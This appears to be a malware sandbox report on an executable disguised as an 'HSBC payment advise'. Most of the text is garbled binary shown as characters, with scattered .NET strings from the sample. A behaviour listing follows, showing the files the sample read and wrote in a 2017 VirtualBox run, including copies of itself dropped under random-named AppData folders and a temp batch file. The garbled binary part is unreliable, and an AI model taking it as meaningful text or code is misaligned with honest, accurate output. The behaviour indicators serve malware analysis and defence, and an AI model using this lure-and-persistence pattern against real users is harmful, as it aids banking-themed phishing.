~Fw=>|30
gI v
N 71$
G:50
xUu-#
q#\
aMAI
t hS&H
c!FAz
NH!a
+G_V
HOhx
A,zg
"=t"
D]zO
;KJ?
n>"OB
76c*
.!#:r
C+T
l66;
PD,)
Dh-8
BF a\Vu/Fw
w:\E
j6@A
KYg
'f[L+j%^
a4@PH
w~h ek
cpt\
3Yw!Y b:
|8&-
/?%,*
Z.Rc
t ]Q
`}4A
b 9=
@ge K
0z4e
OA$TX
gEPC
<MWy
z xvu8Zx9
wi^=
g|m;
A(@A/
u'3'
2 ,\
bdlf~
)Sv[
%; =7
%%fn2 6i
#l29
MZ\H
z t
/Yh-
S|`vb
9s?:D
HR`Z@rk;
o %?
.cu~q]64
E1kd$mDV
zI~Y
NIN:NUN
R]8/
:ct(|
T33F
:\W\
\aMCfDdC
'TKX
+G}4K
tSE[
WphH
Q! =v
oDmDz1
>KQq
b:<i
^kf^G
5p0{
SRb"
YDoU
.ZE _
IY=l
#(do
(1i6
7knk[
:pC?
bjVHd
~aja96=
O4mtc+
v v^O|
.y>-N
+o3i
51MZ
+RN7|
/F$(
L!Tq
N_N;N
MD B
T~e {h
<&?i
TQ/v
FW[o
z .A'
38UC
yhr
s&D\en3G
gxVYu
f SZ
R?R'
'>`<
HBu
q*qr0
eR6
k
r) u
M`wLv,N
?3Ed
4"t_
l]<R
M89+
hdaQ
MLvm
l=jb4
J"Q~
CH>+
REpe
]N v
A kDs
[ZQP
j Fh
,J@O 6C
iJ`(f
~6 o
m*_7
|Wi \J
N 5,=
~e,W
;o`+
:hmz
Kv/>
eCN_
DY,2
aI
J(K'
JL1
W$Py
A"8<
Jw]w
@y=5ci|
AaUS
-^fR
# N/
ce (
wJ4HH
1zxP
[Ay~
D)FP
IK4L
ivI
.,YJ
zLWF
Pg C
=u^(
NmN,N(NuN\NgN<
vNzV
Vg.*
$2ngZ
SfTp
9.tr=
`_k5
9NXa
<)a.
z,l
<2tf
c&:`
Mic,
Gy]8)
np3
~uoL'
BlB4
5m6a
op_Equality
1tA|
m*] f
^$9K
oM[8
1Alu{w
4vtm
& .-:
NnN N[NFN-NVNBNkN N'NONtNdN N
k;7W
Ue98
g9n~
tP)6_
%?_c
]|q*
!yMv
J1#8O0
D"Jz
^1,|
zF2Z
On2p
`:Uq-i
8GC
1Q-I
^1:_0e
"w>1
\$@
~<|,
)'av
JAG%
~Iw 6
'aZ@
Xy1 }
DBxO99
vRFf
({I`
N=N@N
get_Message
j)LR
GT~$/p
9^;R
3^V0
zmHC
1o?k
Ex!f>
;J?1v
i4|;:
2~@D
1f*2
$YF8E|
NhN1N
^|a {9
2?-P p
\3>Q8;
kpv-
UH.4
|WQ5
;Mf.
ftkD/
wi k|
;#M|
a&i('p
BSJB
}9qgq&_
X\i[
:wy{
w5v3W
(q5|
J5t/
JV
1A.w
Ut <
<(CB
3+@
x|.f
iMGJhM1 m
+oyJ
LnjZM
u5PU
KVp=b
X5r/
!;Uo|G
_{'E
Vr&d
qb
-5|p
-$I
4 ^X
e?h/@h
[1V j
j$}g
!uRO
cwDb
.2S'y
WL^t
FY IB8
bD<+
LYZEQ
y @5H
dnc(
&$v!*p
n3|
k"ZSI
\ '_
'Y%O{
uO= z
reG#
3y|R
bArX
,e s
W]eU
(oAR
yL l
?S~E
p>zQ
I8rpD{
rnZs
eAzq
38|1
k7Ya
luy=U
/od]
LR_p kd8w
tznw%G
j 8Zo
XcNG
ZW\y
Rt$b
C >OI
*vw'
TCsZM
U8Kyq05
<6=W
nljW;
Xj!4B
AIB%x
4{i|
*)=_
'8#
OEQ7
# %&
! [u
B;h;
.!%G
qJ=e!
Ia{z<
4 Ean
Ky6B
aPIk
B;Q 4
oqI|h
=fp[
_%_Q7P
f8c
#LC)g
mZj4
Z|J
t r`
;$TF
m*.P
KldS
vI&A{
.%7?
l7!V
"?O`:
)M N
2zH O
Bsfe
z x9
N=N@NkN
9"T
PoUJ
V=jc*
,a3I%r
IMnm
v/(Y
Z +#J
N/'$
G86L=
qGl*JP
>j&u
+7~
/|
m+v#
9L%G
/VOe
BGf
^YT6j):N
J39R7
*! =
Q+AI
O0wn^
54<Q
yF`sc z
R)!X
6 1T
MJ*s
7gh|
!|2=
RgNF
=<,Y
oRr,DIlCS
1 1t P
;V1)
IjG.
H(HT6
~jM:n n
R>On
P|4@
Jihd:
*u]O
XCl^
9H|:
P_+*So*r
t(UR
@{>9
fPs*
7+5J
]2yQ
v+O\
M0^s
iM}Tv
MnRKE
c8O&$F
tkSy
6 w!
OJ*
#?pC
5s"$
]6=}
4~>4'
WGx&
cWM{
z t
H`(m
E J`
iVjI^
f^:
diI#
~2D.
OoPA
HH~e
+ZV7m
eZIW
~?} V,
]PRt
/WK\U
Z9#|
Y{\Q
l^>b
0@NdNdNeNPN'NEN
E7xI
S+&v
XAe4
PxMv
~R*&
<H``
.@4u
P_^X
BoBhm
:V!z@
`(rQ
=Mj#g
L\.a
C%Rwb
2d'0qZv
-Y$m
Hy.w
u( [
VOt
+bSB
qd2.
hn T
#6C,
>Fc7
mG Ec
Z@<E
QhD2
.S"4
Fd Y
9`
+h /
#=a*l
a"LE
`qf}3
vE/
wg,N
jcsl
t79M
/ 'bz
*m:'`
'\o%
fi=2/?
WU%7w
9!2KC
gz6V1W
/\6?
#xMg%
* 43m
NbN_N?NmN
w&WiT]A
C6n8w
8{}br
ayx;p
m{,
buXn
} [q?
fnbq
|Dnf
U9bv
] Kd
Object
Ul q
: w
8G.^^wb{1
:nnp)
%g(`]
l;T>E
Z@t
=bj-
.&?L
F- y
a~7
?# ql
&8f@
7_K'-
k7[Z\_
6K>|
ZR-!P
9yM1
>Mz\
~/P# M
d_K
C(GEm
Sy :
Q-hA
fy P
`O`1
[I}h
Znyt
aX7h
5y@P=J
g)I
hpQ%Sq
5P2&O
CM3\
^t/$C
gV A
m"oc
f/H5
td_O
'q9t
sexP
2Z03Z
Jjvql
m44v
o>-q:G
Lje~
`]I"w,
/#U8
R*?=[
tN1k
[Q(A
9'?j
,-9p"
=Q 4
N"NzN
B9pt
%+H,
51et
Dp8J
uO@{
#Ow7E
z:lA
\ zx
K"p{J
nPMN
Lz(I
m )3MHF'
`?BG
L=oM
p%|*'
.zNWN
OOI8
0xd&
ng1$o
;jDv
mZ*a
*|NJN\N
wJ \
N}N$N5N`N
[$t
Fp's
d4m]
Z"o g
#kL"N
# -\Z
XxF0K?k`
{NBa
`)2`
}F%4o
b44AS
ifm\
Se0/
wTRW
+P,W
+Iks t
~G'iU
o Co
umU=
Cm6 u}:i7
/\jf
NiN7N!NRN>N0N5N>NnNJN^N
Ha`H@
pr%r
[`$,_
'Trq
}`b%
RI0pf
F:3M
*e/
!.EU
"#M|
had
BNUp
Mu xU8
,[R
<5p;
9) T
6Hy#{O
t>i,
APgWq
GkWU
0+oF
3l#j
d_J5r'
HSBC payment advise
UD8)c
,@M;X
%REh
] gZ
mGy:
:~d
P :
I!`#6)
XW4i_
N4+}-uJy
BQ7c
:}~c
GetTypeFromHandle
+2s=i(&
Dt?~N
w<Sld4
fq>i^
K'#1*
D?9o
8mo(
'F` k
o;J/
#|bDT\
3:.3
zW
B_c/=
Wi?6
7l}y
X_2Mw
5& .x
tIU-
6Qdk
#2BY
rfaM
LAa";
m^~?
-C#dP
A!0v
?fv2e%
3A8#
_ C2-
QGOp
;Nzq
|` r
,S0[l
_EhB
:9k5
0W7"
#%Y
ntrW
2)6ut?v
$@yLyi
System.Runtime.CompilerServices
dCU^
y4wb$E
iw&>'2
}dqS
%xG_
p$+C
|/OB.
Aw1i
System.Security.Permissions.SecurityPermissionAttribute, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
W (ZF
j0=Du
&`p-
<F Y
TQ^
sVG1
-,U!^
Y*r#m
}?ypd
eF&gg]7,G
=Bi9
Im7 Q
;3)
4x4P`
YIFT$`
1s}"
G^!6
:Q~5
-5$Lr
yl!
B JF
h:z7
dpaU
|q!R
<fX@
B)o{
^,sk
_g>N
N[NPN
EZDT
V Z+
C#w4
qf:]>
EZDC
*f `z
gNEd
B-7ty
$?Zj
\(&;
?DF[
>)9wr
Y^ZG*
H e
[fJU
hSxmfeI0t d>
`v$3-
h-w1&=
2tS`t0
u!){,
xL40
%'hk
>VU7
HcTn
'sc3j
b a(X
4c?X
trb(Q
"WSH[WfQ
6_.}
Zu1KY
o]Iyr
Hv3
47]I
L@w
:UlsyS%
A_$~qf}G
w(!d
MatOK
?D
.M}=
:/38l.5
p7-I
yA >'
T#;c
]wO
\cK+
6p+kL
#&~V
kwA8
bKIs
s@M7
&dpI
cbfu
ia>~
#(L\ .`
,mf"
#h3U9
Y&2~[!%
\[?
]WH/e
PNf-%
Q:':
9-^|
NhObN
*LW
7uf`
MB+N72
n]#e
UM^"^
z9 wJ(
c",`
cpat_6
>H)1
's.
oU[pN$Eg
{< (=
e:hP[(h{
fb2C
^_N-
HJ@M
r&b?
7I-]D
CsjDe8koK
Q$W]|
1AV,U||Yl
-#w=|
\fa_
z EWCzJ
LateSet
q4H|
iqUw
TS#7
_|7a
ZLau
*3<q
99WL
ifbbL\|
!QHY
/7#^9#
0Lr-
dB\d
wC /h
cdfcUO B
-e[1
X"u!
V5Hi
kGyH
c9(r
System.Collections.Generic
.[L Z
}n^$
RSx)#
8Mmd
^(Ho
NTNJN2NMNuNCN
>p}P
NLU3
rt~uu
F_j!
~3gCr
6j;/~
_hf
( w6T
8EH%6
x8J?Q:fe
;5 x
z cc
NmN?N
Nfo@$
o6?
5t@-
%:m|
J 0a+
`]>>jk?
w2d0
Q|L^*
@]n
hVV:
la@b
;)+
om(d
!T8l
Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven01b_64 Seven01b_64 VirtualBox 2017-07-13 21:51:04 2017-07-13 21:53:58 174

18 Behaviors detected by system signatures

Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven01b_64 Seven01b_64 VirtualBox 2017-07-13 21:51:04 2017-07-13 21:53:58 174

11 Summary items with data

Files

C:\Windows\System32\MSCOREE.DLL.local
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
C:\Windows\Microsoft.NET\Framework\*
C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll
C:\Users\Seven01\AppData\Local\Temp\HSBC-payment-advise.exe.config
C:\Users\Seven01\AppData\Local\Temp\HSBC-payment-advise.exe
C:\Users\Seven01\AppData\Local\Temp\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\system\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\ProgramData\Oracle\Java\javapath\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\wbem\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\WindowsPowerShell\v1.0\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\unrar\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Python27\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Users\Seven01\AppData\Local\Temp\HSBC-payment-advise.exe.Local\
C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e
C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e\msvcr80.dll
C:\Windows
C:\Windows\winsxs
C:\Windows\Microsoft.NET\Framework\v4.0.30319
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\fusion.localgac
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch
C:\Windows\assembly\NativeImages_v2.0.50727_32\index149.dat
C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.INI
C:\Users
C:\Users\Seven01
C:\Users\Seven01\AppData
C:\Users\Seven01\AppData\Local
C:\Users\Seven01\AppData\Local\Temp
C:\Windows\System32\l_intl.nls
C:\Windows\Microsoft.NET\Framework\v2.0.50727\ole32.dll
\Device\KsecDD
C:\Users\Seven01\AppData\Local\Temp\HSBC-payment-advise.INI
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll
C:\Windows\assembly\pubpol23.dat
C:\Windows\assembly\GAC\PublisherPolicy.tme
C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll
C:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.INI
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.INI
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Windows.Forms\2.0.0.0__b77a5c561934e089\System.Windows.Forms.INI
C:\Windows\assembly\GAC_MSIL\System.Drawing\2.0.0.0__b03f5f7f11d50a3a\System.Drawing.INI
C:\Windows\Globalization\it-it.nlp
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
C:\Windows\Globalization\en-us.nlp
C:\Windows\assembly\GAC_32\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089
C:\Windows\assembly\GAC\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089
C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources\mscorlib.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources\mscorlib.resources.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\Culture.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\mscorrc.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\mscorrc.dll.DLL
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it\mscorrc.dll
C:\Windows\Globalization\it.nlp
C:\Windows\assembly\GAC_32\mscorlib.resources\2.0.0.0_it_b77a5c561934e089
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.dll
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.INI
C:\Users\Seven01\AppData\Local\Temp\it-IT\HSBC payment advise.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\HSBC payment advise.resources\HSBC payment advise.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\HSBC payment advise.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it-IT\HSBC payment advise.resources\HSBC payment advise.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it\HSBC payment advise.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it\HSBC payment advise.resources\HSBC payment advise.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it\HSBC payment advise.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it\HSBC payment advise.resources\HSBC payment advise.resources.exe
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\bcrypt.dll
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\psapi.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources\stub.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources\stub.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it\stub.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it\stub.resources\stub.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it\stub.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it\stub.resources\stub.resources.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2080.26468578
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2080.26468578
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2080.26468625
C:\Users\Seven01\AppData\Local\Temp\tmp1F4A.tmp
C:\Windows\SysWOW64\ntdll.dll
C:\Users\Seven01\AppData\Local\Temp\tmp1FA9.tmp
C:\Windows\SysWOW64\kernel32.dll
C:\Users\Seven01\AppData\Roaming
C:\Users\Seven01\AppData\Roaming\Fibaasopixuz
C:\Users\Seven01\AppData\Roaming\Fibaasopixuz\bihyvetet.exe
C:\Users\Seven01\AppData\Roaming\Acmoozsuwede
C:\Users\Seven01\AppData\Roaming\Acmoozsuwede\wawuydvi.tyg
C:\Users\Seven01\AppData\Roaming\Emixabexore
C:\Users\Seven01\AppData\Roaming\Emixabexore\ovepuxtuyki.ewe
C:\Users\Seven01\AppData\Local\Temp\tmpb62df5cb.bat
C:\Users\Seven01\AppData\Roaming\Fibaasopixuz\bihyvetet.exe.config
C:\Users\Seven01\AppData\Roaming\Fibaasopixuz\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Users\Seven01\AppData\Roaming\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Users\Seven01\AppData\Roaming\Fibaasopixuz\bihyvetet.exe.Local\
C:\Users\Seven01\AppData\Roaming\Fibaasopixuz\bihyvetet.INI
C:\Users\Seven01\AppData\Roaming\Fibaasopixuz\it-IT\mscorlib.resources.dll
C:\Users\Seven01\AppData\Roaming\Fibaasopixuz\it-IT\mscorlib.resources\mscorlib.resources.dll
C:\Users\Seven01\AppData\Roaming\Fibaasopixuz\it-IT\mscorlib.resources.exe
C:\Users\Seven01\AppData\Roaming\Fibaasopixuz\it-IT\mscorlib.resources\mscorlib.resources.exe
C:\Users\Seven01\AppData\Roaming\Fibaasopixuz\it-IT\HSBC payment advise.resources.dll
C:\Users\Seven01\AppData\Roaming\Fibaasopixuz\it-IT\HSBC payment advise.resources\HSBC payment advise.resources.dll
C:\Users\Seven01\AppData\Roaming\Fibaasopixuz\it-IT\HSBC payment advise.resources.exe
C:\Users\Seven01\AppData\Roaming\Fibaasopixuz\it-IT\HSBC payment advise.resources\HSBC payment advise.resources.exe
C:\Users\Seven01\AppData\Roaming\Fibaasopixuz\it\HSBC payment advise.resources.dll
C:\Users\Seven01\AppData\Roaming\Fibaasopixuz\it\HSBC payment advise.resources\HSBC payment advise.resources.dll
C:\Users\Seven01\AppData\Roaming\Fibaasopixuz\it\HSBC payment advise.resources.exe
C:\Users\Seven01\AppData\Roaming\Fibaasopixuz\it\HSBC payment advise.resources\HSBC payment advise.resources.exe
C:\Users\Seven01\AppData\Roaming\Fibaasopixuz\it-IT\stub.resources.dll
C:\Users\Seven01\AppData\Roaming\Fibaasopixuz\it-IT\stub.resources\stub.resources.dll
C:\Users\Seven01\AppData\Roaming\Fibaasopixuz\it-IT\stub.resources.exe
C:\Users\Seven01\AppData\Roaming\Fibaasopixuz\it-IT\stub.resources\stub.resources.exe
C:\Users\Seven01\AppData\Roaming\Fibaasopixuz\it\stub.resources.dll
C:\Users\Seven01\AppData\Roaming\Fibaasopixuz\it\stub.resources\stub.resources.dll
C:\Users\Seven01\AppData\Roaming\Fibaasopixuz\it\stub.resources.exe
C:\Users\Seven01\AppData\Roaming\Fibaasopixuz\it\stub.resources\stub.resources.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2436.26474421
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2436.26474421
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2436.26474421
C:\Users\Seven01\AppData\Local\Temp\tmp3081.tmp
C:\Users\Seven01\AppData\Local\Temp\tmp30EF.tmp
C:\Users\Seven01\AppData\Roaming\Acmoozsuwede\wawuydvi.tmp
C:\
C:\Windows\Media\Windows Exclamation.wav
C:\Windows\sysnative\wdmaud.drv
C:\Users\Seven01\AppData\Local\Microsoft\Windows\WER\ERC
C:\Users\Seven01\AppData\Local\Microsoft\Windows\WER\ERC\statecache.lock
C:\Users\Seven01\AppData\Local\Microsoft\Windows\WER\ERC\responsestatecache.xml
C:\Users\Seven01\AppData\Local\Microsoft\Windows\WER\ReportArchive
C:\ProgramData\Microsoft\Windows\WER\ReportArchive
C:\Users\Seven01\AppData\Local\Microsoft\Windows\WER\ERC\queuepester.txt
C:\Windows\sysnative\it-IT\Actioncenter.dll.mui
C:\Program Files\Internet Explorer\ieproxy.dll
C:\Windows\sysnative\Actioncenter.dll.3.Manifest
C:\Windows\sysnative\shell32.dll
\??\IDE#DiskVBOX_HARDDISK___________________________1.0_____#5&33d1638a&0&0.0.0#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
C:\Users\Seven01\AppData\Local\Microsoft\Windows\Explorer
C:\Users\Seven01\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete
C:\Users\Seven01\AppData\Local\Microsoft\Windows\Explorer\thumbcache_32.db
C:\Users\Seven01\AppData\Local\Microsoft\Windows\Explorer\thumbcache_96.db
C:\Users\Seven01\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db
C:\Users\Seven01\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1024.db
C:\Users\Seven01\AppData\Local\Microsoft\Windows\Explorer\thumbcache_sr.db
C:\Users\Seven01\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db
C:\Windows\sysnative\wbem\WmiPrvSE.exe
C:\Windows\inf\disk.inf
C:\Windows\sysnative\DriverStore\it-IT\disk.inf_loc
C:\Windows\inf\disk.PNF
C:\Windows\inf\hdaudio.inf
C:\Windows\sysnative\DriverStore\it-IT\hdaudio.inf_loc
C:\Windows\inf\hdaudio.PNF
C:\Windows\sysnative\en-US\KERNELBASE.dll.mui
C:\Windows\sysnative\en\KERNELBASE.dll.mui
C:\Windows\sysnative\KERNELBASE.dll
\??\PIPE\samr
C:\Windows\sysnative\wbem\repository
C:\Windows\sysnative\wbem\Logs
C:\Windows\sysnative\wbem\AutoRecover
C:\Windows\sysnative\wbem\MOF
C:\Windows\sysnative\wbem\repository\INDEX.BTR
C:\Windows\sysnative\wbem\repository\WRITABLE.TST
C:\Windows\sysnative\wbem\repository\MAPPING1.MAP
C:\Windows\sysnative\wbem\repository\MAPPING2.MAP
C:\Windows\sysnative\wbem\repository\MAPPING3.MAP
C:\Windows\sysnative\wbem\repository\OBJECTS.DATA
C:\Windows\sysnative\wbem\repository\WBEM9xUpgd.dat
\??\pipe\PIPE_EVENTROOT\CIMV2WMI SELF-INSTRUMENTATION EVENT PROVIDER
\??\pipe\PIPE_EVENTROOT\CIMV2PROVIDERSUBSYSTEM
C:\Windows\Globalization\Sorting\sortdefault.nls
\??\ide#diskvbox_harddisk___________________________1.0_____#5&33d1638a&0&0.0.0#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}

Read Files

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
C:\Users\Seven01\AppData\Local\Temp\HSBC-payment-advise.exe.config
C:\Users\Seven01\AppData\Local\Temp\HSBC-payment-advise.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e\msvcr80.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch
C:\Windows\assembly\NativeImages_v2.0.50727_32\index149.dat
C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
C:\Windows\System32\l_intl.nls
\Device\KsecDD
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll
C:\Windows\assembly\pubpol23.dat
C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
C:\Windows\Microsoft.NET\Framework\v2.0.50727\Culture.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it\mscorrc.dll
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.dll
C:\Users\Seven01\AppData\Local\Temp\tmp1F4A.tmp
C:\Windows\SysWOW64\ntdll.dll
C:\Users\Seven01\AppData\Local\Temp\tmp1FA9.tmp
C:\Windows\SysWOW64\kernel32.dll
C:\Users\Seven01\AppData\Roaming\Fibaasopixuz\bihyvetet.exe
C:\Users\Seven01\AppData\Roaming\Acmoozsuwede\wawuydvi.tyg
C:\Users\Seven01\AppData\Roaming\Emixabexore\ovepuxtuyki.ewe
C:\Users\Seven01\AppData\Roaming
C:\Users\Seven01\AppData\Roaming\Fibaasopixuz\bihyvetet.exe.config
C:\Users\Seven01\AppData\Local\Temp\tmp3081.tmp
C:\Users\Seven01\AppData\Local\Temp\tmp30EF.tmp
C:\Users\Seven01\AppData\Roaming\Acmoozsuwede\wawuydvi.tmp
C:\Users\Seven01\AppData\Local\Temp\tmpb62df5cb.bat
C:\Windows\Media\Windows Exclamation.wav
C:\Users\Seven01\AppData\Local\Microsoft\Windows\WER\ReportArchive
C:\ProgramData\Microsoft\Windows\WER\ReportArchive
C:\Users\Seven01\AppData\Local\Microsoft\Windows\WER\ERC
C:\Windows\sysnative\it-IT\Actioncenter.dll.mui
C:\Program Files\Internet Explorer\ieproxy.dll
C:\Windows\sysnative\Actioncenter.dll.3.Manifest
C:\Users\Seven01\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db
C:\Users\Seven01\AppData\Local\Microsoft\Windows\Explorer\thumbcache_32.db
C:\Users\Seven01\AppData\Local\Microsoft\Windows\Explorer\thumbcache_96.db
C:\Users\Seven01\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db
C:\Users\Seven01\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1024.db
C:\Users\Seven01\AppData\Local\Microsoft\Windows\Explorer\thumbcache_sr.db
C:\Windows\sysnative\wbem\WmiPrvSE.exe
C:\Windows\inf\disk.PNF
C:\Windows\inf\hdaudio.PNF
C:\Windows\sysnative\en-US\KERNELBASE.dll.mui
C:\Windows\sysnative\en\KERNELBASE.dll.mui
C:\Windows\inf\hdaudio.inf
C:\Windows\sysnative\DriverStore\it-IT\hdaudio.inf_loc
\??\PIPE\samr
C:\Windows\sysnative\wbem\repository\MAPPING1.MAP
C:\Windows\sysnative\wbem\repository\MAPPING2.MAP
C:\Windows\sysnative\wbem\repository\MAPPING3.MAP
C:\Windows\sysnative\wbem\repository\OBJECTS.DATA
